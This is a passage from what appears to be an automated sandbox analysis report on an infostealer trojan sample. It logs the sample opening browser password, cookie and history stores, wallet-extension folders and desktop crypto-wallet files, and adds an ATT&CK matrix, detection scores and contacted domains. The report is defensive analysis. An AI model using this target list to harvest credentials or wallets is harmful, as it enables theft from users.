              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.jsJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqliteJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
              Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe PID: 5156, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe PID: 5156, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
              Windows Management Instrumentation
              1
              DLL Side-Loading
              1
              DLL Side-Loading
              11
              Virtualization/Sandbox Evasion
              1
              OS Credential Dumping
              121
              Security Software Discovery
              Remote Services1
              Credential API Hooking
              1
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              PowerShell
              Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
              Deobfuscate/Decode Files or Information
              1
              Credential API Hooking
              11
              Virtualization/Sandbox Evasion
              Remote Desktop Protocol31
              Data from Local System
              2
              Non-Application Layer Protocol
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
              DLL Side-Loading
              Security Account Manager1
              Process Discovery
              SMB/Windows Admin SharesData from Network Shared Drive113
              Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDS1
              File and Directory Discovery
              Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets12
              System Information Discovery
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe40%VirustotalBrowse
              SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe29%ReversingLabs
              SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe100%Joe Sandbox ML
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              bg.microsoft.map.fastly.net0%VirustotalBrowse
              plaintediousidowsko.shop1%VirustotalBrowse
              fp2e7a.wpc.phicdn.net0%VirustotalBrowse
              SourceDetectionScannerLabelLink
              http://ocsp.sectigo.com00%URL Reputationsafe
              http://x1.c.lencr.org/00%URL Reputationsafe
